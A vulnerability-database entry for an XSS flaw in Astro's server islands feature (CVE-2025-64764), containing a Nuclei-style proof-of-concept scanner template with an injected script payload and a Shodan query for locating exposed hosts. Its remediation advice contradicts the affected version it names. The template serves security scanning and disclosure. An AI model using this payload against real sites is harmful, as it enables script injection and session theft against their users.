漏洞描述
Astro 5.15.8 contains a reflected XSS caused by improper handling of server islands feature, letting remote attackers execute scripts, exploit requires use of server islands in the application.
CVE-2025-64764: Astro - Reflected XSS via server islands feature
PoC代码[已公开]
id: CVE-2025-64764
info:
name: Astro - Reflected XSS via server islands feature
author: DhiyaneshDk,zhero___
severity: high
description: |
Astro 5.15.8 contains a reflected XSS caused by improper handling of server islands feature, letting remote attackers execute scripts, exploit requires use of server islands in the application.
impact: |
Remote attackers can execute scripts in users' browsers, potentially leading to session hijacking or data theft.
remediation: |
Update to version 5.15.8 or later.
reference:
- https://zhero-web-sec.github.io/research-and-things/unlocking-reflected-xss-in-the-astro-framework
metadata:
verified: true
max-request: 2
shodan-query: html:"_server-islands"
tags: cve,cve2025,astro,xss
variables:
rand: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 2
matchers:
- type: regex
part: body
regex:
- '/_server-islands/[^?]+\?e='
internal: true
extractors:
- type: regex
name: value
part: body
internal: true
group: 1
regex:
- '/_server-islands/([^?]+)\?e='
- raw:
- |
GET /_server-islands/{{value}}?e=file&p=&s={"{{rand}}":"<img+src=x+onerror=alert(0)>"} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "<img src=x onerror=alert(0)>")'
condition: and
# digest: 4b0a00483046022100849f47e26d3acb8d85525d633ff1113f0a51fce03e36e110238b443e25fe787f022100b416c231013203600d9774eaad0ebaff614dc4a7ab9648e4a8b8aaaa625b827d:922c64590222798bb761d5b6d8e72950